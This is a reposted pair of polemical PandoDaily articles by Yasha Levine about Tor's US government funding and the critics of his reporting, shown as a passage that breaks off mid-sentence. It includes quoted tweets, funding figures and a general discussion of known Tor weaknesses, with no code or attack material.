@puellavulnerata yeah I just don’t see the news here. — Jillian C. York (@jilliancyork) July 17, 2014 The reason? Because it was not being shared very much on social media: @puellavulnerata well, it seems like only 15 or so people have bothered to tweet the article, so… — Jillian C. York (@jilliancyork) July 17, 2014 (I’m not convinced that social traffic is a meaningful measure of an article’s importance but, for what it’s worth, the piece currently has around 1.5k Twitter shares and a little over 4k Facebook likes.) Morgan Marquis-Boire, a former Googler who was recently poached by Pierre Omidyar to run security at First Look, called me a loony conspiracy theorist for reporting on Tor’s government funding—but then contradicted himself by arguing that this “conspiracy theory” is a matter of public record. It was a baffling, oxymoronic argument to make—accusing my article of being both a wild conspiracy theory, yet also boring old news that no one should bother reading—but for some reason, Tor defenders thought this self-contradiction made perfect logical sense: I wish all the @torproject conspiracy theorists would just read the damn website https://t.co/bYo88BNY81 — Morgan Mayhem (@headhntr) July 28, 2014 Pando’s Tor conspiracy piece stops just short of the real truth… That Roger Dingledine is really Senator Palpatine Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily — Morgan Mayhem (@headhntr) July 18, 2014 @ggreenwald @torproject they get funding from USG?? “…which houses the NSA.” -> connect the dots sheeple! — Morgan Mayhem (@headhntr) July 28, 2014 Christopher Soghoian, who works on privacy policies for the ACLU, took the lowest, scummiest road. Soghoian compared my reporting on Tor to the Protocols of the Elders of Zion, a sick anti-Semitic forgery disseminated by the Tsar’s secret police, unleashing waves of deadly pogroms against Jews across the Russian Empire in the early 20th century. As a refugee from the Soviet Union whose family escaped from state sponsored anti-Semitism, I found Soghoian’s comparison to be outrageously offensive and disgusting. It seems that Tor is developed by the Elders of Zion, and @ioerror is responsible for 9/11. Almost everyone involved in developing Tor was (or is) funded by the US government | PandoDaily Hall of Mirrors: Wikileaks volunteer helped build Tor, was funded by the Pentagon | PandoDaily — Christopher Soghoian (@csoghoian) August 6, 2014 I tried to confront Soghoian over his disgusting anti-Semitic smear against me: Last thing I need is for you, @csoghoian, to smear my reporting by comparing to virulent anti-Semitic propaganda. — Yasha Levine (@yashalevine) August 6, 2014 But the ACLU’s Soghoian brushed it off with snark: @yashalevine you want to talk about offensive? Look at your Twitter background image. Totally unfair to @RogerDingledine. — Christopher Soghoian (@csoghoian) August 6, 2014 And mocked me as a mentally ill paranoiac: @exiledonline Your pal is a conspiracy theorist who sees black helicopters everywhere. Go read his hatchet job against Tor, — Christopher Soghoian (@csoghoian) August 6, 2014 Only later, after getting his smears out of his system, Soghoian was finally able to formulate something of a critique. It boiled down to this: He did not like my article because it raised questions about Tor’s longstanding financial relationship with the US government’s military-intelligence agencies—which he found irrelevant, allowing only for purely technical critiques as relevant: “My beef is that your article has no solid technical criticism, but some hand waving about funding. There are so many things you could have nailed Tor for, but instead, you went for lazy low hanging fruit about funding.” What were these many things I could have nailed Tor for? Well, he was helpful enough to give me a couple of suggestions: “There are many things about Tor to worthy of criticism: A crappy user interface, no auto security updates, no browser sandbox. Your attacks against Tor’s state dept funding, or Roger’s summer internship in college at the NSA, are stupid though.” Yes, what sane journalist would care that Tor was created by military intelligence, is currently funded by the government and is almost certainly a giant honeypot. That’s all secondary and “low hanging fruit” compared to the big giant issue of our day: Tor’s crappy user interface. I thought I’d seen it all when an ACLU technology celebrity took to hurling anti-Semitic smears against my reporting. Until last week. That’s when the Los Angeles Review of Books published an article by a computer researcher/privacy activist named Harry Halpin. The article purported to be a review of Julian Assange’s new book, “When Google Met Wikileaks”—but in the middle of his review, Halpin went off on a longwinded tangent attacking me. He called me a conspiracy theorist for reporting on Tor’s government funding, and falsely accused me and PandoDaily of being funded by the CIA: If Levine is looking for a pot of magical money that has not been touched by the evils of this world, he could always look at his own employer PandoDaily. Levine and PandoDaily are publicly funded by Greylock Partners, who are senior partners with the [sic] In-Q-Tel, the venture capital wing of the CIA. So, the CIA funded Yasha Levine when he exposed that the State Department funded Tor in order to defend CIA agents. The problem with conspiracy theories — including any analysis of conspiracies as networks — is that one immediately runs up against the incommensurable reality of late capitalism: everything is actually connected. Halpin later admitted that he lied about the CIA-Pando link, saying he did so in order to “prove” a larger point: that investigative journalism that follows the money—like reporting on Tor’s government financing—is nothing but useless conspiracy mongering. Why? Because everything is “connected” so it’s just silly (and a bit crazy) to make a connection between funding and influence. Halpin’s editor added two corrections to the piece, including rewording my alleged CIA link to read “So one could argue that the CIA funded Yasha Levine…” And, yes, one could argue that, assuming one was happy to fabricate facts from whole cloth. As it turned out, Halpin, like the Tor developers and their defenders, had other reasons to try to discredit reporting on funding and conflicts-of-interest. Halpin is the president of LEAP, a small privacy/encryption outfit that gets most of its funding from various government sources—including more than $1 million from Radio Free Asia’s “Open Technology Fund.” This fund just happens to be a major financial backer of the Tor Network; last year alone, the Open Technology Fund gave Tor $600,000. The fund also happens to be run out of the Broadcasters Board of Governors (BBG), an old CIA spinoff dedicated to waging propaganda warfare against regimes hostile to US interests. The BBG—which until recently was called the International Broadcasting Bureau—has also been one of the biggest backers of Tor going back to 2007. So… Halpin attacks me for reporting on Tor’s conflicted government financing—getting money from the very entities Tor purports to protect the public from—while his privacy startup is funded by same government agency that funds Tor. And in one of the craziest twists, Halpin—who lied about my and Pando’s CIA ties—turns out to be funded by an organization that was founded by the CIA. No “one could argue” about it. It doesn’t get more absurd than this—or more unethical. When the attacks first started a few months back, I had thought maybe they were driven by a petty defensive reflex: Many were vocal and public supporters of Tor and recommended it to others as an effective tool to protect them from government surveillance. Perhaps the article made them look or feel stupid — after all, no one likes being outed as a sucker. But as the attacks on my article rolled on, month after month, I began to realize there was something more going on, for the oldest reason in the books: self-interest, and money. Most of the privacy activists who attacked my reporting had spent their careers moving through the same tight circle of advocacy groups, think-tanks and nonprofits—all funded by the same small network of government and corporate foundations that fund Tor: Radio Free Asia, State Department, Google, Peirre Omidyar, Ford Foundation. These were people circling the wagons and protecting themselves by smearing critical reporting on Tor’s funding. Take EFF’s Jillian York. After continuously mocking and playing down concerns about Tor’s funding, York penned an article—”Why we need Tor now more than ever”—that hard-sold Tor as the best and most urgent way for users to protect themselves from government Big Brother surveillance. York made no mention of the government’s ongoing sponsorship of Tor; instead she misrepresented Tor as totally independent since 2006. Without elaborating, she claimed that it “receives funding from a range of sources, including individual donors”: Initially developed by the U.S. Naval Research Laboratory and DARPA, Tor (which originally stood for “the onion router”) is free software that enables anonymity and censorship circumvention. Since 2006, the Tor Project has operated as a nonprofit organization based out of Massachusetts; it receives funding from a range of sources, including individual donors. Karen Reilly, the Tor Project’s development director, told me that since the organization enabled donations with Bitcoin—the peer-to-peer payment system that allows users to send money anonymously—the organization has seen an uptick in donations, an unsurprising development given their user base. This is crude sophistry that does a disservice to York’s readers. Sure, Tor might receive funding from a “range of sources,” but the overwhelming majority of Tor’s funding comes from just one: the United States Government, which has continued to provide anywhere from 70 to 100% of Tor’s annual budget since 2007. Jillian York, of all people, should know better. Her employer, EFF, is one of the biggest promotors of Tor. It was also an early financial sponsor, and was instrumental in helping Tor transition from a US Navy project to an “independent” organization back in 2004. EFF even shares two corporate funders with Tor: Google and the Omidyar Network. Even more importantly: Jillian York sits on the advisory council of Radio Free Asia’s “Open Technology Fund,” the federal government entity and a major backer of Tor that also funds LARB book reviewer Harry Halrin’s company. Morgan Marquis-Boire, the First Look Media techie who called me a conspiracy theorist for investigating Tor’s funding, is another prime example. Marquis-Boire is listed as a “special advisor” to EFF; he’s also a longtime researcher at Toronto-based Citizen Lab, a forensic tech outfit backed by Google, Ford Foundation, George Soros’ Open Society Institute, Palantir and Canada’s version of USAID. Citizen Lab is also a close partner of Radio Free Asia’s “Open Technology Fund.” Before taking his current job with Omidyar, he was on Google’s payroll. Then there’s ACLU’s Christopher Soghoian, who compared my Tor reporting to deadly anti-Semitic propaganda. Soghoian has been dubbed the “Ralph Nader for the Internet Age” by Wired, but it’s a curious analogy. Nader’s fame came from fighting corporate power and greed; but Soghoian has spent his entire career sucking from the corporate teat, indiscriminately moving from one oligarch’s foundation to another: graduate school scholarship from Google in 2006/2007; the Koch brothers’ Institute for Humane Studies, chaired by Charles Koch himself, in 2008/2009; fellowship at Harvard’s Berkman Center for Internet & Society, an outfit funded by the State Department, USAID, Soros, Google, Omidyar, and so on; Soros Open Society fellowship in 2011/2012; TEDGlobal Fellow in 2012, funded in part by Amazon billionaire Jeff Bezos; and most recently, a fellowship at Yale Law School’s Information Society Project, which is funded by Google, Ford Foundation, Soros, Microsoft and many many more. Not surprisingly, Soghoian’s policy work on privacy and encryption argues that markets are the solution to online privacy and surveillance problems, not laws, regulations or politics. In a recent paper published in the Harvard Journal of Law and Technology—which was co-authored with a former-prosecutor-turned-lobbyist—Soghoian argued that encryption technology, not regulations, was the only thing that could effectively protect Americans from surveillance: “communications of Americans will only be secured through the use of privacy enhancing technologies like encryption, not with regulations prohibiting the use or sale of interception technology.” No wonder all these people are so upset by my reporting. They’ve branded themselves as radical activists fighting The Man and the corporate surveillance apparatus—while taking money from the US government’s military and foreign policy arms, as well as the biggest and worst corporate violators of our privacy. By branding themselves as radical activists, they appear to share the same interests as the grassroots they seek to influence; exposing their funding conflicts-of-interests makes it hard for them to pose as grassroots radicals. So instead of explaining why getting funding from the very entitities that Tor is supposed to protect users from is not a problem, they’ve taken the low road to discredit the very idea of reporting on monetary conflicts-of-interests as either irrelevant, or worse, a sign of mental illness. Who would’ve thought that many of the people we’ve entrusted with protecting our online privacy have the same values as sleazy K Street lobbyists. Sursa: How leading Tor developers and advocates tried to smear me after I reported their US Government ties | PandoDaily

Almost everyone involved in developing Tor was (or is) funded by the US government By Yasha Levine On July 16, 2014 “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, “Oh, it’s another CIA agent.” If those are the only people using the network.” —Roger Dingledine, co-founder of the Tor Network, 2004 *** In early July, hacker Jacob Appelbaum and two other security experts published a blockbuster story in conjunction with the German press. They had obtained leaked top secret NSA documents and source code showing that the surveillance agency had targeted and potentially penetrated the Tor Network, a widely used privacy tool considered to be the holy grail of online anonymity. Internet privacy activists and organizations reacted to the news with shock. For the past decade, they had been promoting Tor as a scrappy but extremely effective grassroots technology that can protect journalists, dissidents and whistleblowers from powerful government forces that want to track their every move online. It was supposed to be the best tool out there. Tor’s been an integral part of EFF’s “Surveillance Self-Defense” privacy toolkit. Edward Snowden is apparently a big fan, and so is Glenn Greenwald, who says it “allows people to surf without governments or secret services being able to monitor them.” But the German exposé showed Tor providing the opposite of anonymity: it singled out users for total NSA surveillance, potentially sucking up and recording everything they did online. To many in the privacy community, the NSA’s attack on Tor was tantamount to high treason: a fascist violation of a fundamental and sacred human right to privacy and free speech. The Electronic Frontier Foundation believes Tor to be “essential to freedom of expression.” Appelbaum — a Wikileaks volunteer and Tor developer — considers volunteering for Tor to be a valiant act on par with “going to Spain to fight the Franco fascists” on the side of anarchist revolutionaries. It’s a nice story, pitting scrappy techno-anarchists against the all-powerful US Imperial machine. But the facts about Tor are not as clear cut or simple as these folks make them out to be… Let’s start with the basics: Tor was developed, built and financed by the US military-surveillance complex. Tor’s original — and current — purpose is to cloak the online identity of government agents and informants while they are in the field: gathering intelligence, setting up sting operations, giving human intelligence assets a way to report back to their handlers — that kind of thing. This information is out there, but it’s not very well known, and it’s certainly not emphasized by those who promote it. Peek under Tor’s hood, and you quickly realize that just everybody involved in developing Tor technology has been and/or still is funded by the Pentagon or related arm of the US empire. That includes Roger Dingledine, who brought the technology to life under a series of military and federal government contracts. Dingledine even spent a summer working at the NSA. If you read the fine print on Tor’s website, you’ll see that Tor is still very much in active use by the US government: “A branch of the U.S. Navy uses Tor for open source intelligence gathering, and one of its teams used Tor while deployed in the Middle East recently. Law enforcement uses Tor for visiting or surveilling web sites without leaving government IP addresses in their web logs, and for security during sting operations.” NSA? DoD? U.S. Navy? Police surveillance? What the hell is going on? How is it possible that a privacy tool was created by the same military and intelligence agencies that it’s supposed to guard us against? Is it a ruse? A sham? A honeytrap? Maybe I’m just being too paranoid… Unfortunately, this is not a tinfoil hat conspiracy theory. It is cold hard fact. Brief history of Tor The origins of Tor go back to 1995, when military scientists at the Naval Research Laboratory began developing cloaking technology that would prevent someone’s activity on the Internet from being traced back to them. They called it “onion routing” — a method redirecting traffic into a parallel peer-to-peer network and bouncing it around randomly before sending it off to its final destination. The idea was to move it around so as to confuse and disconnect its origin and destination, and make it impossible for someone to observe who you are or where you’re going on the Internet. Onion routing was like a hustler playing the three-card monte with your traffic: the guy trying to spy on you could watch it going under one card, but he never knew where it would come out. The technology was funded by the Office of Naval Research and DARPA. Early development was spearheaded by Paul Syverson, Michael Reed and David Goldschlag — all military mathematicians and computer systems researchers working for the Naval Research Laboratory, sitting inside the massive Joint Base Anacostia-Bolling military base in Southeast Washington, D.C. The original goal of onion routing wasn’t to protect privacy — or at least not in the way most people think of “privacy.” The goal was to allow intelligence and military personnel to work online undercover without fear of being unmasked by someone monitoring their Internet activity. “As military grade communication devices increasingly depend on the public communications infrastructure, it is important to use that infrastructure in ways that are resistant to traffic analysis. It may also be useful to communicate anonymously, for example when gathering intelligence from public databases,” explained a 1997 paper outlining an early version of onion routing that was published in the Naval Research Labs Review. In the 90s, as public Internet use and infrastructure grew and multiplied, spooks needed to figure out a way to hide their identity in plain sight online. An undercover spook sitting in a hotel room in a hostile country somewhere couldn’t simply dial up CIA.gov on his browser and log in — anyone sniffing his connection would know who he was. Nor could a military intel agent infiltrate a potential terrorist group masquerading as an online animal rights forum if he had to create an account and log in from an army base IP address. That’s where onion routing came in. As Michael Reed, one of the inventors of onion routing, explained: providing cover for military and intelligence operations online was their primary objective; everything else was secondary: The original *QUESTION* posed that led to the invention of Onion Routing was, “Can we build a system that allows for bi-directional communications over the Internet where the source and destination cannot be determined by a mid-point?” The *PURPOSE* was for DoD / Intelligence usage (open source intelligence gathering, covering of forward deployed assets, whatever). Not helping dissidents in repressive countries. Not assisting criminals in covering their electronic tracks. Not helping bit-torrent users avoid MPAA/RIAA prosecution. Not giving a 10 year old a way to bypass an anti-porn filter. Of course, we knew those would be other unavoidable uses for the technology, but that was immaterial to the problem at hand we were trying to solve (and if those uses were going to give us more cover traffic to better hide what we wanted to use the network for, all the better…I once told a flag officer that much to his chagrin). Apparently solving this problem wasn’t very easy. Onion router research progressed slowly, with several versions developed and discarded. But in 2002, seven years after it began, the project moved into a different and more active phase. Paul Syverson from the Naval Research Laboratory stayed on the project, but two new guys fresh outta MIT grad school came on board: Roger Dingledine and Nick Mathewson. They were not formally employed by Naval Labs, but were on contract from DARPA and the U.S. Naval Research Laboratory’s Center for High Assurance Computer Systems. For the next several years, the three of them worked on a newer version of onion routing that would later become known as Tor. Very early on, researchers understood that just designing a system that only technically anonymizes traffic is not enough — not if the system is used exclusively by military and intelligence. In order to cloak spooks better, Tor needed to be used by a diverse group of people: Activists, students, corporate researchers, soccer moms, journalists, drug dealers, hackers, child pornographers, foreign agents, terrorists — the more diverse the group that spooks could hide in the crowd in plain sight. Tor also needed to be moved off site and disassociated from Naval research. As Syverson told Bloomberg in January 2014: “If you have a system that’s only a Navy system, anything popping out of it is obviously from the Navy. You need to have a network that carries traffic for other people as well.” Dingledine said the same thing a decade earlier at the 2004 Wizards of OS conference in Germany: “The United States government can’t simply run an anonymity system for everybody and then use it themselves only. Because then every time a connection came from it people would say, ‘Oh, it’s another CIA agent.’ If those are the only people using the network.” The consumer version of Tor would be marketed to everyone and — equally important — would eventually allow anyone to run a Tor node/relay, even from their desktop computer. The idea was to create a massive crowdsourced torrent-style network made up from thousands of volunteers all across the world. At the very end of 2004, with Tor technology finally ready for deployment, the US Navy cut most of its Tor funding, released it under an open source license and, oddly, the project was handed over to the Electronic Frontier Foundation. “We funded Roger Dingledine and Nick Mathewson to work on Tor for a single year from November 2004 through October 2005 for $180,000. We then served as a fiscal sponsor for the project until they got their 501©(3) status over the next year or two. During that time, we took in less than $50,000 for the project,” EFF’s Dave Maass told me by email. In a December 2004 press release announcing its support for Tor, EFF curiously failed to mention that this anonymity tool was developed primarily for military and intelligence use. Instead, it focused purely on Tor’s ability to protect free speech from oppressive regimes in the Internet age. “The Tor project is a perfect fit for EFF, because one of our primary goals is to protect the privacy and anonymity of Internet users. Tor can help people exercise their First Amendment right to free, anonymous speech online,” said EFF’s Technology Manager Chris Palmer. Later on, EFF’s online materials began mentioning that Tor had been developed by the Naval Research Lab, but played down the connection, explaining that it was “in the past.” Meanwhile the organization kept boosting and promoting Tor as a powerful privacy tool: “Your traffic is safer when you use Tor.” Playing down Tor’s ties to the military… The people at EFF weren’t the only ones minimizing Tor’s ties to the military. In 2005, Wired published what might have been the first major profile of Tor technology. The article was written by Kim Zetter, and headlined: “Tor Torches Online Tracking.” Although Zetter was a bit critical of Tor, she made it seem like the anonymity technology had been handed over by the military with no strings attached to “two Boston-based programmers” — Dingledine and Nick Mathewson, who had completely rebuilt the product and ran it independently. Dingledine and Mathewson might have been based in Boston, but they — and Tor — were hardly independent. At the time that the Wired article went to press in 2005, both had been on the Pentagon payroll for at least three years. And they would continue to be on the federal government’s payroll for at least another seven years. In fact, in 2004, at the Wizards of OS conference in Germany, Dingledine proudly announced that he was building spy craft tech on the government payroll: “I forgot to mention earlier something that will make you look at me in a new light. I contract for the United States Government to built anonymity technology for them and deploy it. They don’t think of it as anonymity technology, although we use that term. They think of it as security technology. They need these technologies so they can research people they are interested in, so they can have anonymous tip lines, so that they can buy things from people without other countries knowing what they are buying, how much they are buying and where it is going, that sort of thing.” Government support kept rolling in well after that. In 2006, Tor research was funded was through a no-bid federal contract awarded to Dingledine’s consulting company, Moria Labs. And starting in 2007, the Pentagon cash came directly through the Tor Project itself — thanks to the fact that Team Tor finally left EFF and registered its own independent 501©(3) non-profit. How dependent was — and is — Tor on support from federal government agencies like the Pentagon? In 2007, it appears that all of Tor’s funding came from the federal government via two grants. A quarter million came from the International Broadcasting Bureau (IBB), a CIA spinoff that now operates under the Broadcasting Board of Governors. IBB runs Voice of America and Radio Marti, a propaganda outfit aimed at subverting Cuba’s communist regime. The CIA supposedly cut IBB financing in the 1970s after its ties to Cold War propaganda arms like Radio Free Europe were exposed. The second chunk of cash — just under $100,000 — came from Internews, an NGO aimed at funding and training dissident and activists abroad. Tor’s subsequent tax filings show that grants from Internews were in fact conduits for “pass through” grants from the US State Department. In 2008, Tor got $527,000 again from IBB and Internews, which meant that 90% of its funding came U.S. government sources that year. In 2009, the federal government provided just over $900,000, or about 90% of the funding. Part of that cash came through a $632,189 federal grant from the State Department, described in tax filings as a “Pass-Through from Internews Network International.” Another $270,000 came via the CIA-spinoff IBB. The Swedish government gave $38,000, while Google gave a minuscule $29,000. Most of that government cash went out in the form of salaries to Tor administrators and developers. Tor co-founders Dingledine and Mathewson made $120,000. Jacob Appelbaum, the rock star hacker, Wikileaks volunteer and Tor developer, made $96,000. In 2010, the State Department upped its grant to $913,000 and IBB gave $180,000 — which added up to nearly $1 million out of a total of $1.3 million total funds listed on tax filings that year. Again, a good chunk of that went out as salaries to Tor developers and managers. In 2011, IBB gave $150,00, while another $730,000 came via Pentagon and State Department grants, which represented more than 70% of the grants that year. (Although based on tax filings, government contracts added up to nearly 100% of Tor’s funding.) The DoD grant was passed through the Stanford Research Institute, a cutting edge Cold War military-intel outfit. The Pentagon-SRI grant to Tor was given this description: “Basic and Applied Research and Development in Areas Relating to the Navy Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance.” That year, a new government funder came the scene: Swedish International Development Cooperation Agency (SIDA), Sweden’s version of USAID, gave Tor $279,000. In 2012, Tor nearly doubled its budget, taking in $2.2 million from Pentagon and intel-connected grants: $876,099 came from the DoD, $353,000 from the State Department, $387,800 from IBB. That same year, Tor lined up an unknown amount funding from the Broadcasting Board of Governors to finance fast exit nodes. Tor at the NSA? In 2013, the Washington Post revealed that the NSA had figured out various ways of unmasking and penetrating the anonymity of the Tor Network. Since 2006, according to a 49-page research paper titled simply “Tor,” the agency has worked on several methods that, if successful, would allow the NSA to uncloak anonymous traffic on a “wide scale” — effectively by watching communications as they enter and exit the Tor system, rather than trying to follow them inside. One type of attack, for example, would identify users by minute differences in the clock times on their computers. The evidence came out of Edward Snowden’s NSA leaks. It appeared that the surveillance agency had developed several techniques to get at Tor. One of the documents explained that the NSA “pretty much guaranteed to succeed.” Snowden’s leaks revealed another interesting detail: In 2007, Dingledine gave at a talk at the NSA’s HQ explaining Tor, and how it worked. The Washington Post published the NSA’s notes from their meeting with Dingledine. They showed that Dingledine and the NSA mostly talked about the technical details of Tor — how the network works and some of its security/usability tradeoffs. The NSA was curious about “Tor’s customers,” and Dingledine ran down some of the types of people who could benefit from Tor: Blogger Alice, 8 yr. old Alice, Sick Alice, Consumer Alice, Oppressed Alice, Business Alice, Law Enforcement Alice… Interestingly, Dingledine told the NSA that “the way TOR is spun is dependent on who the ‘spinee’ is” — meaning that he markets Tor technology in different ways to different people? Interestingly, the Washington Post article described Dingledine’s trip to the NSA as “a wary encounter, akin to mutual intelligence gathering, between a spy agency and a man who built tools to ward off electronic surveillance.” Dingledine told the paper that he came away from that meeting with the feeling that the NSA was trying to hack the Tor network: “As hespoke to the NSA, Dingledine said in an interview Friday, he suspected the agency was attempting to break into Tor, which is used by millions of people around the world to shield their identities.” Dingledine may very well have been antagonistic during his meeting with the NSA. Perhaps he was protective over his Tor baby, and didn’t want its original inventors and sponsors in the US government taking it back. But whatever the reason, the antagonism was not likely borne out of some sort of innate ideological hostility towards the US national security state. Aside from being on the DoD payroll, Dingledine has spends a considerable amount of his time meeting and consulting with military, intelligence and law enforcement agencies to explain why Tor’s so great, and instructing them on how to use it. What kind of agencies does he meet with? The FBI, CIA and DOJ are just a few… And if you listen to Dingledine explain these encounters in some of his public appearances, one does not detect so much as a whiff of antagonism towards intelligence and law enforcement agencies. In 2013, during a talk at UC San Diego, Dingledine cheerfully recalled how an exuberant FBI agent rushed up to thank him during his recent trip to the FBI: “So I’ve been doing a lot of talks lately for law enforcement. And pretty much every talk I do these days, sone FBI person comes up to me afterwards and says, ‘I use Tor everyday for my job. Thank you.’ Another example is anonymous tips — I was talking to the folks who run the CIA anonymous tip line. It’s called the Iraqi Rewards Program…” Dingledine’s close collaboration with law enforcement aside, there’s the strangely glib manner in which he dismissed news about the NSA hacking into Tor. He seemed totally unconcerned by the evidence revealed by Snowden’s leaks, and played down the NSA’s capabilities in his comments to the Washington Post: “If those documents actually represent what they can do, they are not as big an adversary as I thought.” I reached out to Dingledine to ask him about his trip to the NSA and whether he warned the Tor community back in 2007 that he suspected the NSA was targeting Tor users. He didn’t respond. How safe is Tor, really? If Dingledine didn’t appear to be fazed by evidence of the NSA’s attack on Tor anonymity, it’s strange considering that an attack by a powerful government entity has been known to be one Tor’s principle weaknesses for quite some time. In a 2011 discussion on Tor’s official listserv, Tor developer Mike Perry admitted that Tor might not be very effective against powerful, organized “adversaries” (aka governments) that are capable monitoring huge swaths of the Internet. “Extremely well funded adversaries that are able to observe large portions of the Internet can probably break aspects of Tor and may be able to deanonymize users. This is why the core tor program currently has a version number of 0.2.x and comes with a warning that it is not to be used for “strong anonymity”. (Though I personally don’t believe any adversary can reliably deanonymize *all* tor users . . . but attacks on anonymity are subtle and cumulative in nature). Indeed, just last year, Syverson was part of a research team that pretty much proved that Tor can no longer be expected to protect users over the long term. “Tor is known to be insecure against an adversary that can observe a user’s traffic entering and exiting the anonymity network. Quite simple and efficient techniques can correlate traffic at these separate locations by taking advantage of identifying traffic patterns. As a result, the user and his destination may be identified, completely subverting the protocol’s security goals.” The researchers concluded: “These results are somewhat gloomy for the current security of the Tor network.” While Syverson indicated that some of the security issues identified by this research have been addressed in recent Tor versions, the findings only added to a growing list of other research and anecdotal evidence showing Tor’s not as safe as its boosters want you to think — especially when pitted against determined intelligence agencies. Case-in-point: In December 2013, a 20-year-old Harvard panicked overachiever named Edlo Kim learned just how little protection Tor offered for would be terrorists. To avoid taking a final exam he wasn’t prepared for, Kim hit up on the idea of sending in a fake bomb threat. ?? cover his tracks, he used Tor, supposedly the best anonymity service the web had to offer. But it did little mask his identity from a determined Uncle Sam. A joint investigation, which involved the FBI, the Secret Service and local police, was able to track the fake bomb threat right back to Kim — in less than 24 hours. As the FBI complaint explained, “Harvard University was able to determine that, in the several hours leading up to the receipt of the e-mail messages described above, ELDO KIM accessed TOR using Harvard’s wireless network.” All that Tor did was make the cops jump a few extra steps. But it wasn’t hard, nothing that a bit of manpower with full legal authority to access network records couldn’t solve. It helped that Harvard’s network logging all metadata access on the network — sorta like the NSA. Over the past few years, U.S. law enforcement has taken control and shutdown a series of illegal child porn and drug marketplaces operating on what should have been untraceable, hyper-anonymous servers running in the Tor cloud. In 2013, they took down Freedom Hosting, which was accused of being a massive child porn hosting operation — but not before taking control of its servers and intercepting all of its communication with customers. The FBI did the same thing that same year with the online drug superstore Silkroad, which also ran its services in the Tor cloud. Although, rookie mistakes helped FBI unmask the identity of Dred Pirate Roberts, it is still a mystery how they were able to totally take over and control, and even copy, a server run in the Tor cloud — something that is supposed to be impossible. Back in 2007, a Swedish hacker/researcher named Dan Egerstad showed that just by running a Tor node, he could siphon and read all the unencrypted traffic that went through his chunk of the Tor network. He was able to access logins and passwords to accounts of NGOs, companies, and the embassies of India and Iran. Egerstad thought at first that embassy staff were just being careless with their info, but quickly realized that he had actually stumbled on a hack/surveillance operation in which Tor was being used to covertly access these accounts. Although Egerstad was a big fan of Tor and still believes that Tor can provide anonymity if used correctly, the experience made him highly suspicious. He told Sydney Morning Herald that he thinks many of the major Tor nodes are being run by intelligence agencies or other parties interested in listening in on Tor communication. “I don’t like speculating about it, but I’m telling people that it is possible. And if you actually look in to where these Tor nodes are hosted and how big they are, some of these nodes cost thousands of dollars each month just to host because they’re using lots of bandwidth, they’re heavy-duty servers and so on. Who would pay for this and be anonymous? For example, five of six of them are in Washington D.C.…” Tor stinks? Tor supporters point to a cache of NSA documents leaked by Snowden to prove that the agency fears and hates Tor. A 2013 Guardian story based on these docs — written by James Ball, Bruce Schneier and Glenn Greenwald — argues that agency is all but powerless against the anonymity tool. …the documents suggest that the fundamental security of the Torservice remains intact. One top-secret presentation, titled ‘Tor Stinks’, states: “We will never be able to de-anonymize all Tor users all the time.” It continues: “With manual analysis we can de-anonymize a very small fraction of Tor users,” and says the agency has had “no success de-anonymizing a user in response” to a specific request. Another top-secret presentation calls Tor “the king of high-secure, low-latency internet anonymity”. But the NSA docs are far from conclusive and offer conflicting bits of evidence, allowing for multiple interpretations. But the fact is that the NSA and GCHQ clearly have the capability to compromise Tor, but it might take a bit of targeted effort. One thing is clear: the NSA most certainly does not hate or fear Tor. And some aspects about Tor are definitely welcomed by the NSA, in part because it helps concentrate potential “targets” in one convenient location. Tor Stinks… But it Could be Worse • Critical mass of targets use Tor. Scaring them away might be counterproductive. • We can increase our success rate and provide more client IPs for individual Tor users. • We will never get 100% but we don’t need to provide true IPs for every target every time they use Tor. Tor network is not as difficult to capture as it may seem… In 2012, Tor co-founder Roger Dingledine revealed that the Tor Network is configured to prioritize speed and route traffic through through the fastest servers/nodes available. As a result, the vast bulk of Tor traffic runs through several dozen of the fastest and most dependable servers: “on today’s network, clients choose one of the fastest 5 exit relays around 25-30% of the time, and 80% of their choices come from a pool of 40-50 relays.” Dingledine was criticized by Tor community for the obvious reason that funneling traffic through a handful of fast nodes made surveilling and subverting Tor much easier. Anyone can run a Tor node — a research student in Germany, a guy with FIOS connection in Victorville (which is what I did for a few months), an NSA front out of Hawaii or a guy working for China’s Internet Police. There’s no way of knowing if the people running the fastest most stable nodes are doing it out of goodwill or because it’s the best way to listen in and subvert the Tor network. Particularly troubling was that Snowden’s leaks clearly showed the NSA and GCHQ run Tor nodes, and are interested in running more. And running 50 Tor nodes doesn’t seem like it would be too difficult for any of the world’s intelligence agencies — whether American, German, British, Russian, Chinese or Iranian. Hell, if you’re an intelligence agency, there’s no reason not to run a Tor node. Back in 2005, Dingledine admitted to Wired that this was a “tricky design question” but couldn’t provide a good answer to how they’d handle it. In 2012, he dismissed his critics altogether, explaining that he was perfectly willing to sacrifice security for speed — whatever it took to take get more people to use Tor: This choice goes back to the original discussion that Mike Perry and I were wrestling with a few years ago… if we want to end up with a fast safe network, do we get there by having a slow safe network and hoping it’ll get faster, or by having a fast less-safe network and hoping it’ll get safer? We opted for the “if we don’t stay relevant to the world, Tor will never grow enough” route. Speaking of spooks running Tor nodes… If you thought the Tor story couldn’t get any weirder, it can and does. Probably the strangest part of this whole saga is the fact that Edward Snowden ran multiple high-bandwidth Tor nodes while working as an NSA contractor in Hawaii. This only became publicly known last May, when Tor developer Runa Sandvik (who also drew her salary from Pentagon/State Department sources at Tor) told Wired’s Kevin Poulsen that just two weeks before he would try to get in touch with Glenn Greenwald, Snowden emailed her, explaining that he ran a major Tor node and wanted to get some Tor stickers. Stickers? Yes, stickers. Here’s Wired: In his e-mail, Snowden wrote that he personally ran one of the “major tor exits”–a 2 gbps server named “TheSignal”–and was trying to persuade some unnamed coworkers at his office to set up additional servers. He didn’t say where he worked. But he wanted to know if Sandvik could send him a stack of official Tor stickers. (In some post-leak photos of Snowden you can see the Tor sticker on the back of his laptop, next to the EFF sticker). Snowden’s request for Tor stickers turned into something a bit more intimate. Turned out that Sandvik was already planning to go to Hawaii for vacation, so she suggested they meet up to talk about communication security and encryption. She wrote Snowden back and offered to give a presentation about Tor to a local audience. Snowden was enthusiastic and offered to set up a crypto party for the occasion. So the two of them threw a “crypto party” at a local coffee shop in Honolulu, teaching twenty or so locals how to use Tor and encrypt their hard drives. “He introduced himself as Ed. We talked for a bit before everything started. And I remember asking where he worked or what he did, and he didn’t really want to tell,” Sandvik told Wired. But she did learn that Snowden was running more than one Tor exit node, and that he was trying to get some of his buddies at “work”to set up additional Tor nodes… H’mmm….So Snowden running powerful Tor nodes and trying to get his NSA colleagues to run them, 